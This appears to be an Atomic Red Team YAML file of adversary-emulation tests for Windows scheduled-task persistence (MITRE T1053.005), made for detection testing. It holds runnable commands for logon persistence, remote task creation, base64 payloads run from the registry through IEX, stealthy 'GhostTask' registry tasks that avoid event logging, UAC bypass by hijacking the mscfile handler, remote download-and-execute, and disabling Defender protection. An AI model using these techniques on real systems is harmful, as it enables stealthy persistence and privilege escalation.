Br3akp0int
062948f44f
* ShrinkLocker PIN,TPM Bitlocker Registry Modification * Revert "ShrinkLocker PIN,TPM Bitlocker Registry Modification" * UAC and persistence - T1053.005.yaml UAC and persistence * Update T1053.005.yaml adding atomic back in --------- Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
343 lines
16 KiB
YAML
343 lines
16 KiB
YAML
attack_technique: T1053.005
|
|
display_name: 'Scheduled Task/Job: Scheduled Task'
|
|
atomic_tests:
|
|
- name: Scheduled Task Startup Script
|
|
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
|
|
description: |
|
|
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
|
|
the tasks, open the Task Scheduler and look in the Active Tasks pane.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
|
|
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
|
|
cleanup_command: |
|
|
schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
|
|
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Scheduled task Local
|
|
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
|
|
description: |
|
|
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
task_command:
|
|
description: What you want to execute
|
|
type: string
|
|
default: C:\windows\system32\cmd.exe
|
|
time:
|
|
description: What time 24 Hour
|
|
type: string
|
|
default: "20:10"
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
cleanup_command: |
|
|
SCHTASKS /Delete /TN spawn /F >nul 2>&1
|
|
- name: Scheduled task Remote
|
|
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
|
|
description: |
|
|
Create a task on a remote system.
|
|
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
task_command:
|
|
description: What you want to execute
|
|
type: string
|
|
default: C:\windows\system32\cmd.exe
|
|
time:
|
|
description: What time 24 Hour
|
|
type: string
|
|
default: "20:10"
|
|
target:
|
|
description: Target
|
|
type: string
|
|
default: localhost
|
|
user_name:
|
|
description: 'Username to authenticate with, format: DOMAIN\User'
|
|
type: string
|
|
default: DOMAIN\user
|
|
password:
|
|
description: Password to authenticate with
|
|
type: string
|
|
default: At0micStrong
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
cleanup_command: |
|
|
SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
|
|
description: |
|
|
Create an atomic scheduled task that leverages native powershell cmdlets.
|
|
|
|
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
$Action = New-ScheduledTaskAction -Execute "calc.exe"
|
|
$Trigger = New-ScheduledTaskTrigger -AtLogon
|
|
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
|
|
$Set = New-ScheduledTaskSettingsSet
|
|
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
|
|
Register-ScheduledTask AtomicTask -InputObject $object
|
|
cleanup_command: |
|
|
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
|
|
- name: Task Scheduler via VBA
|
|
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
|
|
description: |
|
|
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
|
|
30 - 40 seconds after this module has run
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
ms_product:
|
|
description: Maldoc application Word
|
|
type: string
|
|
default: Word
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Microsoft #{ms_product} must be installed
|
|
prereq_command: |
|
|
try {
|
|
New-Object -COMObject "#{ms_product}.Application" | Out-Null
|
|
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
|
|
Stop-Process -Name $process
|
|
exit 0
|
|
} catch { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
|
|
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
|
|
name: powershell
|
|
cleanup_command: |
|
|
Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
|
|
- name: WMI Invoke-CimMethod Scheduled Task
|
|
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
|
|
description: |
|
|
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
xml_path:
|
|
description: path of vbs to use when creating masquerading files
|
|
type: path
|
|
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
File to copy must exist on disk at specified location (#{xml_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
|
|
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
|
|
cleanup_command: |
|
|
Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1
|
|
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
|
|
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
|
|
description: |
|
|
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
|
|
The scheduled task will launch powershell to decode and run the command in the registry daily.
|
|
This is a persistence mechanism recently seen in use by Qakbot.
|
|
|
|
[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
time:
|
|
description: Daily scheduled task execution time
|
|
type: string
|
|
default: '07:45'
|
|
executor:
|
|
command: |
|
|
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
|
|
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
|
|
cleanup_command: |
|
|
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
|
|
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
|
|
name: command_prompt
|
|
- name: Import XML Schedule Task with Hidden Attribute
|
|
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
|
|
description: |
|
|
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute.
|
|
This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
xml_path:
|
|
description: path of vbs to use when creating masquerading files
|
|
type: path
|
|
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
File to copy must exist on disk at specified location (#{xml_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
|
|
executor:
|
|
name: powershell
|
|
elevation_required: true
|
|
command: |
|
|
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
|
|
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
|
|
cleanup_command: |
|
|
Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
|
|
- name: PowerShell Modify A Scheduled Task
|
|
auto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
|
|
description: |
|
|
Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered.
|
|
It will first be created to spawn cmd.exe, but modified to run notepad.exe.
|
|
|
|
Upon successful execution, powershell.exe will create a scheduled task and modify the action.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
|
|
$Trigger = New-ScheduledTaskTrigger -AtLogon
|
|
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
|
|
$Set = New-ScheduledTaskSettingsSet
|
|
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
|
|
Register-ScheduledTask AtomicTaskModifed -InputObject $object
|
|
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
|
|
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
|
|
cleanup_command: |
|
|
Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1
|
|
- name: Scheduled Task ("Ghost Task") via Registry Key Manipulation
|
|
auto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54
|
|
description: |
|
|
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
|
|
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
|
|
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
task_name:
|
|
description: Name of the newly-added task
|
|
type: string
|
|
default: lilghostie
|
|
task_command:
|
|
description: Command you want the task to execute
|
|
type: string
|
|
default: notepad.exe
|
|
target:
|
|
description: System where the task should run
|
|
type: string
|
|
default: localhost
|
|
user_name:
|
|
description: Username to authenticate with, such as ATOMICDOMAIN\AtomicAdmin
|
|
type: string
|
|
default: $env:USERDOMAIN + '\' + $env:USERNAME
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
PsExec tool from Sysinternals must exist in the ExternalPayloads directory
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
|
|
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
|
|
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
|
|
- description: |
|
|
GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe") { exit 0} else { exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe"
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
|
|
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
|
|
cleanup_command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
|
|
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
|
|
|
|
- name: Scheduled Task Persistence via CompMgmt.msc
|
|
auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
|
|
description: |
|
|
Adds persistence by abusing `compmgmt.msc` via a scheduled task.
|
|
When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`).
|
|
This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
task_name:
|
|
description: Name of the newly-created scheduled task
|
|
type: string
|
|
default: CompMgmtBypass
|
|
payload:
|
|
description: Command you want the task to execute
|
|
type: string
|
|
default: calc.exe
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
|
|
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
|
|
ECHO Let's open the Computer Management console now...
|
|
compmgmt.msc
|
|
cleanup_command: |
|
|
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
|
|
schtasks /Delete /TN "#{task_name}" /F
|
|
|
|
- name: Scheduled Task Persistence via Eventviewer.msc
|
|
auto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c
|
|
description: |
|
|
Adds persistence by abusing `eventviewer.msc` via a scheduled task.
|
|
When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`).
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
task_name:
|
|
description: Name of the newly-created scheduled task
|
|
type: string
|
|
default: EventViewerBypass
|
|
payload:
|
|
description: Command you want the task to execute
|
|
type: string
|
|
default: calc.exe
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
|
|
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
|
|
ECHO Let's run the schedule task ...
|
|
schtasks /Run /TN "EventViewerBypass"
|
|
cleanup_command: |
|
|
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
|
|
schtasks /Delete /TN "#{task_name}" /F
|
|
|